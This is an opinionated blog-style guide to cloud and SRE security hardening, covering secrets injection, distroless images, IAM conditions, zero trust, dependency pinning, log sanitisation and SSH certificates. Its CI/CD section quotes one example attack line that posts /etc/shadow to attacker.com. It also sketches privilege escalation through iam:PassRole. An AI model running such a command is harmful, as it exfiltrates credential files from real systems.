Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE
I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token TTL on our legacy sidecars. When the old tokens expired, the sidecars couldn’t re-authenticate because the new Vault nodes were still in a sealed state, waiting for manual unseal keys that were stored in a “secure” physical safe three miles away from my home office. The site stayed dark for four hours while I drove through a thunderstorm to get a piece of paper with a hex string on it.
That is the reality of cybersecurity “best practices.” They look great on a SOC 2 compliance spreadsheet, but they fail spectacularly when they meet the friction of real-world infrastructure. We spend millions on “Next-Gen AI-Driven Threat Detection” and then leave a .git directory in a public S3 bucket or hardcode a STRIPE_LIVE_KEY in a Dockerfile because “it’s just for the staging build.” If you’re looking for a list of tools to buy, close this tab. If you want to know how to stop your infrastructure from becoming a headline, let’s talk about the trade-offs that actually matter.
The Environment Variable Trap
Most cybersecurity “best practices” guides tell you to store secrets in environment variables. This is lazy advice. Environment variables are effectively public knowledge once someone gets a shell on your container. Anyone who can run ps auxe or cat /proc/1/environ can see your database credentials. If you use a crash reporting tool like Sentry or Datadog, and your app throws an unhandled exception, there is a non-zero chance your entire environment block is being shipped to a third-party SaaS platform in a stack trace.
Stop doing this. Use filesystem-based secret injection. If you are on Kubernetes, use the Secrets Store CSI Driver. It mounts secrets as files in a tmpfs volume. When the pod dies, the secrets vanish from memory. They aren’t persisted to disk, and they aren’t sitting in the process environment block for every child process to inherit.
# This is what a real SecretProviderClass looks like.
# Don't use the 'secretObjects' sync unless you absolutely need
# to support legacy apps that can't read from a file.
apiVersion: secrets-store.csi.x-k8s.io/v1
kind: SecretProviderClass
metadata:
  name: api-secrets-vault
spec:
  provider: vault
  parameters:
    vaultAddress: "https://vault.internal.production:8200"
    roleName: "api-service-role"
    objects: |
      - objectName: "db-password"
        secretPath: "secret/data/production/api"
        secretKey: "password"
      - objectName: "api-key"
        secretPath: "secret/data/production/api"
        secretKey: "key"
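For completeness, here is a minimal sketch of the consuming pod. The names are illustrative; the point is that the volume references the SecretProviderClass above and the driver surfaces each object as a file on tmpfs:

# Pod-side sketch (names are illustrative). The CSI volume below
# references the SecretProviderClass defined above.
apiVersion: v1
kind: Pod
metadata:
  name: api
spec:
  containers:
    - name: api
      image: registry.internal/api:1.0.0
      volumeMounts:
        - name: api-secrets
          mountPath: "/var/run/secrets/api"
          readOnly: true
  volumes:
    - name: api-secrets
      csi:
        driver: secrets-store.csi.k8s.io
        readOnly: true
        volumeAttributes:
          secretProviderClass: "api-secrets-vault"

Your app then reads /var/run/secrets/api/db-password like any other file, and nothing ever touches the environment block.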
Pro-tip: If you must use environment variables for legacy reasons, at least use a wrapper that clears them after the process starts. But honestly? Just fix the app to read from /var/run/secrets/. It takes ten minutes of coding and saves you a week of incident response.
The Alpine Linux Myth
The industry has a strange obsession with Alpine Linux for Docker images. “It’s small!” they say. “The attack surface is tiny!” they claim. Here is what they don’t tell you: Alpine uses musl instead of glibc. I have lost count of the number of times I’ve seen mysterious performance degradation or DNS resolution bugs because a Python or Node.js library expected glibc behavior and got musl instead.
From a security perspective, Alpine is also a pain. Because it’s so minimal, the moment you need to debug something in production, you realize you don’t even have curl or dig. So what do developers do? They add apk add --no-cache curl bind-tools to the Dockerfile. Now you’ve just manually rebuilt a larger attack surface, but with the added bonus of potential binary incompatibilities.
Use debian-slim or, better yet, Google’s distroless images. Distroless contains only your application and its runtime dependencies. No shell. No package manager. No ls. If an attacker gets an RCE (Remote Code Execution) in a distroless container, they can’t even cd into a directory to look around. They have to bring their own toolset, which is a much higher bar to clear.
- Distroless images reduce the number of “Critical” and “High” vulnerabilities in your Snyk/Trivy scans by about 80% compared to standard Ubuntu images.
- You avoid the LD_PRELOAD trickery that attackers use to hijack library calls.
- Your CI/CD pipeline runs faster because you aren’t pulling 200MB of bloated OS layers.
- Debugging is harder, yes. Use kubectl debug with an ephemeral container instead of baking tools into your production image.
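As a concrete sketch, here is a multi-stage build that ships only a static Go binary onto distroless. The module path and binary name are illustrative, and the same pattern works for any compiled runtime:

# Build stage: full toolchain, never shipped to production
FROM golang:1.22 AS build
WORKDIR /src
COPY . .
RUN CGO_ENABLED=0 go build -o /app ./cmd/api

# Runtime stage: no shell, no package manager, runs as non-root
FROM gcr.io/distroless/static-debian12
COPY --from=build /app /app
USER nonroot
ENTRYPOINT ["/app"]

When you do need to poke around a live pod, kubectl debug -it <pod> --image=busybox --target=<container> attaches an ephemeral debug container without those tools ever shipping in the production image.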
IAM: The “Action: *” Sin
Identity and Access Management (IAM) is where security goes to die. I’ve audited “secure” AWS environments where the S3-Read-Only policy was attached to a role that also had iam:PassRole permissions. Congratulations: combined with ec2:RunInstances, that lets a user launch an EC2 instance with an administrator instance profile and harvest its credentials from the metadata service. You just gave them administrative access to the entire account.
The right approach to IAM is not just “Least Privilege.” It’s “Least Privilege with Conditions.” If you have a Lambda function that needs to write to an S3 bucket, don’t just give it s3:PutObject on arn:aws:s3:::my-bucket/*. Use conditions to restrict the IP address, the encryption status, and even the time of day if you’re feeling spicy.
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowPutObjectOnlyWithEncryption",
      "Effect": "Allow",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::customer-data-uploads-prod/*",
      "Condition": {
        "StringEquals": {
          "s3:x-amz-server-side-encryption": "aws:kms"
        },
        "ArnEquals": {
          "aws:PrincipalArn": "arn:aws:iam::123456789012:role/api-worker-role"
        }
      }
    }
  ]
}
Note to self: Always check for iam:CreateAccessKey permissions. I once saw a developer create a “service account” user for a CI/CD pipeline and give it this permission so it could “manage its own keys.” An attacker compromised the CI/CD, generated 500 access keys, and used them to bypass rate limits while exfiltrating the entire database.
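If you run AWS Organizations, you can ban that pattern outright with a Service Control Policy. A minimal sketch, assuming a single blessed iam-admin role is the only principal allowed to mint access keys (the role name is a placeholder):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenySelfServiceAccessKeys",
      "Effect": "Deny",
      "Action": "iam:CreateAccessKey",
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/iam-admin"
        }
      }
    }
  ]
}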
The False Security of the VPN
If your security strategy relies on “being on the VPN,” you are living in 2005. VPNs are a single point of failure. Once an attacker phishes a single employee and gets their VPN credentials (and bypasses the often-flimsy MFA), they are “inside” the network. From there, it’s a lateral movement playground.
The real best-practice move is toward a Zero Trust architecture. Use something like Tailscale or Cloudflare Access. Every single request to an internal tool, whether it’s your Jenkins instance or a staging DB, should be authenticated and authorized at the application layer, not just the network layer.
I’ve seen companies spend $50k on a hardware firewall while their internal Jira instance was running a version from 2018 with a known RCE. Because it was “behind the VPN,” they didn’t think it was a priority. Then a contractor’s laptop got infected with Emotet, and suddenly the “secure” internal network was a botnet node.
Stop trusting the network. Start trusting the identity. Every internal service should require an OIDC (OpenID Connect) token. No exceptions. If your internal tool doesn’t support OIDC, put an oauth2-proxy in front of it. It’s a 5MB Go binary that saves you from a multi-million dollar breach.
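To make that concrete, here is a minimal sketch of oauth2-proxy running as a Kubernetes container in front of a legacy internal app. The issuer URL, client ID, upstream, and secret name are all placeholders for your own environment:

# Container spec sketch for oauth2-proxy; all hostnames and names are placeholders.
containers:
  - name: oauth2-proxy
    image: quay.io/oauth2-proxy/oauth2-proxy:v7.6.0
    args:
      - --provider=oidc
      - --oidc-issuer-url=https://sso.internal.example/realms/eng
      - --client-id=internal-tools
      - --upstream=http://jira.internal:8080
      - --http-address=0.0.0.0:4180
      - --email-domain=example.com
    envFrom:
      # Supplies OAUTH2_PROXY_CLIENT_SECRET and OAUTH2_PROXY_COOKIE_SECRET
      - secretRef:
          name: oauth2-proxy-credentials

Route traffic through port 4180 and the legacy app never sees an unauthenticated request.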
Dependency Hell and the “Audit” Lie
Running npm audit is not a security strategy. It’s a way to generate noise that developers eventually learn to ignore. Most of the “vulnerabilities” reported by these tools are “Moderate” ReDoS (Regular Expression Denial of Service) bugs in build-time dependencies that will never see a single byte of production traffic.
You need to prioritize. Focus on the supply chain. If you are pulling latest for any dependency, you are asking for a bad time. Pin your versions. Pin your hashes.
# Bad: You have no idea what version of the base image you're getting tomorrow
FROM node:18
# Better: You've pinned the version, but the tag can still be overwritten
FROM node:18.16.0-slim
# Best: You've pinned the SHA256 digest. This is immutable.
FROM node:18.16.0-slim@sha256:e363026139158913989369836913691369136913691369136913691369136913
The same applies to your application code. Use package-lock.json, go.sum, or a requirements.txt with hashes. I remember the ua-parser-js hijack in 2021: anyone with a range like ^0.7.28 automatically pulled the malicious 0.7.29 release the moment it was published. Exact version pins would have saved them, and hash pins protect you even in the rarer case where malicious code is republished under an existing version number.
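On the Python side, for instance, pip can enforce hash pinning. A sketch; the digest below is an obvious placeholder, since the real ones come out of pip-compile:

# requirements.txt, generated with: pip-compile --generate-hashes requirements.in
# Install with: pip install --require-hashes -r requirements.txt
# pip refuses anything whose digest doesn't match (hash shown is a placeholder).
requests==2.31.0 \
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000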
Pro-tip: Use a tool like Renovate or Dependabot, but configure it to only auto-merge “Patch” updates for non-critical libraries. For anything else, you need a human to look at the changelog. Yes, it’s slow. Yes, it’s “friction.” That’s the point.
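In Renovate, that policy is a few lines of renovate.json. A sketch, where the matchPackageNames entries are placeholders for whatever you consider non-critical:

{
  "extends": ["config:recommended"],
  "packageRules": [
    {
      "matchUpdateTypes": ["patch"],
      "matchPackageNames": ["eslint", "prettier"],
      "automerge": true
    }
  ]
}

Everything else waits for a human and a changelog.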
Logging: The Log4j Lesson
We all remember December 2021. The world burned because a logging library was too powerful for its own good. But the real lesson of Log4j wasn’t “update your jars.” It was “don’t log what you don’t control.”
I’ve seen SREs log the entire User-Agent string, the X-Forwarded-For header, and the full request body of every 400-level error. This is a goldmine for attackers. If I can inject a payload into a header that you then log, I can potentially trigger a vulnerability in your logging pipeline—whether it’s Log4j, an Elasticsearch injection, or a buffer overflow in a legacy syslog-ng parser.
Sanitize your logs. Use a structured logging library (like zap in Go or structlog in Python) and explicitly define the fields you want to capture. Never, ever log PII (Personally Identifiable Information). I once had to spend a weekend scrubbing 40TB of S3 logs because a junior dev decided to log the auth_payload, which contained raw credit card numbers in plain text.
{
  "level": "error",
  "ts": 1625097600.123,
  "caller": "api/handler.go:42",
  "msg": "failed to process payment",
  "request_id": "req_9a8b7c6d",
  "user_id": "user_12345",
  "error": "invalid expiry date",
  "stacktrace": "..."
}
Note that we log the user_id and request_id, but not the card_number or the cvv. This seems obvious, but when you’re 12 hours into a production outage, “log everything” becomes a very tempting (and dangerous) mantra.
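For reference, producing that kind of log line with zap looks roughly like this. A sketch with the field values hardcoded for illustration:

package main

import (
	"errors"

	"go.uber.org/zap"
)

func main() {
	// NewProduction emits JSON logs like the example above.
	logger, _ := zap.NewProduction()
	defer logger.Sync()

	err := errors.New("invalid expiry date")

	// Enumerate fields explicitly. No request bodies, no raw headers,
	// and definitely no card_number or cvv.
	logger.Error("failed to process payment",
		zap.String("request_id", "req_9a8b7c6d"),
		zap.String("user_id", "user_12345"),
		zap.Error(err),
	)
}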
The SSH Key Management Nightmare
If you are still manually adding id_rsa.pub strings to authorized_keys files, you are operating a ticking time bomb. People leave companies. People lose laptops. People “borrow” keys from coworkers.
The best practice here is to stop using static SSH keys entirely. Use SSH Certificates. Netflix’s BLESS or HashiCorp Vault’s SSH secrets engine are the gold standard. A user authenticates with their SSO (Okta, Google, etc.), and in exchange, they get a short-lived (e.g., 1 hour) SSH certificate signed by your internal CA.
If a laptop is stolen, the key is already expired. If an employee is fired, their SSO access is revoked, and they can no longer request new certificates. No more authorized_keys cleanup scripts that inevitably miss one server and leave a backdoor open for years.
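The server-side half of the certificate setup is a single sshd_config directive; the CA public key path is whatever you choose:

# /etc/ssh/sshd_config
# Trust user certificates signed by your internal CA
TrustedUserCAKeys /etc/ssh/trusted-user-ca-keys.pem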
If you can’t do certificates yet, at least use ProxyJump through a bastion host that has mandatory MFA. And for the love of all that is holy, disable password authentication in /etc/ssh/sshd_config:
# /etc/ssh/sshd_config
PasswordAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
MaxAuthTries 3
AllowAgentForwarding no
X11Forwarding no
The “Break Glass” Procedure
Security is often at odds with availability. If you lock down your production environment so tightly that no one can access it, what happens when the database is deadlocking and the automated scripts are failing?
You need a “Break Glass” procedure. This is a documented, tested way to gain emergency administrative access. It should involve:
- A physical or digital “vault” (like a 1Password for Teams vault) that requires multiple people to approve access.
- Immediate, high-priority alerting (PagerDuty, Slack, Email) the moment those credentials are used (see the event-pattern sketch after this list).
- A mandatory post-mortem every time the “Break Glass” is used to figure out why the standard, automated tools weren’t enough.
- Automatic rotation of the credentials immediately after the incident is resolved.
- Hardened logging that cannot be deleted by the “Break Glass” user (e.g., streaming logs to a separate, write-only AWS account).
- A clear definition of what constitutes an “emergency.”
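For the alerting item above, a sketch of an EventBridge event pattern that fires whenever the break-glass IAM user signs in to the console; the account ID and user name are placeholders:

{
  "source": ["aws.signin"],
  "detail-type": ["AWS Console Sign In via CloudTrail"],
  "detail": {
    "userIdentity": {
      "arn": ["arn:aws:iam::123456789012:user/break-glass"]
    }
  }
}

Point the rule’s target at an SNS topic or PagerDuty integration so a human gets paged within seconds, not at the end of the month.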
Without a Break Glass procedure, your SREs will find “creative” ways to bypass security controls when the pressure is on. And “creative” is just another word for “vulnerable.”
The CI/CD Pipeline: Your Biggest Vulnerability
We spend so much time hardening production, but we treat our CI/CD pipelines like a playground. Your CI/CD system (GitHub Actions, GitLab CI, Jenkins) has the keys to the kingdom. It can deploy code, it can modify infrastructure, and it often has access to your most sensitive secrets.
If I’m an attacker, I’m not going to try to exploit your hardened Kubernetes cluster. I’m going to submit a PR to a random internal repo that adds a curl -X POST -d @/etc/shadow attacker.com line to your build.sh. If your CI/CD isn’t configured to require approval for PRs from forks, or if it runs on every commit without oversight, I’m in.
Cybersecurity best practices for CI/CD:
- OIDC for Cloud Access: Stop storing AWS Access Keys in GitHub Secrets. Use OIDC to get temporary credentials (see the workflow sketch after this list).
- Isolated Runners: Don’t share runners between projects. A compromised build in a “test” project shouldn’t be able to steal secrets from a “production” project.
- Immutable Build Artifacts: Build your image once, sign it (using Cosign/Sigstore), and promote that exact image through your environments. Never rebuild the same code for staging and production.
- Network Isolation: Your CI runners should not have unrestricted outbound internet access. They need to talk to your package registry and your cloud provider’s API. That’s it.
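Here is what the first item looks like in a GitHub Actions workflow. The role ARN and region are placeholders, and there is not a single long-lived key stored anywhere:

# .github/workflows/deploy.yml (sketch; role ARN and region are placeholders)
name: deploy
on:
  push:
    branches: [main]

permissions:
  id-token: write   # lets the job request an OIDC token from GitHub
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github-actions-deploy
          aws-region: us-east-1
      - run: aws sts get-caller-identity   # proves we received short-lived credentials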
I once saw a Jenkins server that had been “temporarily” given AdministratorAccess in AWS so it could debug a Terraform issue. It stayed that way for six months. When a plugin with a known vulnerability was exploited, the attacker didn’t just get the Jenkins server; they got the entire AWS organization. They started spinning up p3.16xlarge instances for crypto mining, and the company didn’t notice until the $40,000 bill arrived at the end of the month.
The Reality of “Best Practices”
The truth is that a “best practice” isn’t a specific tool or a specific configuration. It’s about reducing the “Blast Radius.” You have to assume that every component of your system will be compromised at some point. The process, the container, the node, the network, the developer’s laptop: they are all fallible.
Your job as an SRE isn’t to build a wall that can’t be breached. It’s to build a system where a breach in one area doesn’t lead to a total collapse. This means defense in depth. It means mTLS between services. It means granular IAM roles. It means not being afraid to say “no” to a developer who wants to run their container as root because they’re too lazy to fix a permission issue in their /app/data folder.
Stop chasing the hype. Stop buying the “AI-powered” blinky-light boxes. Fix your secrets, harden your images, and for the love of God, rotate your keys. Security is a boring, repetitive, and often thankless job. But it’s a lot better than being the person who has to explain to the board why the company’s entire database is for sale on a Telegram channel for $500 in Monero.
If you can’t explain the technical trade-off of a security decision, you aren’t practicing security; you’re practicing superstition.